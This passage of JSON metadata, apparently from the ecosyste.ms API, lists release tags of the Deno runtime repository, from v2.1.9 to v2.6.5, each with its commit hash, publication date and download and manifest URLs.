land%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G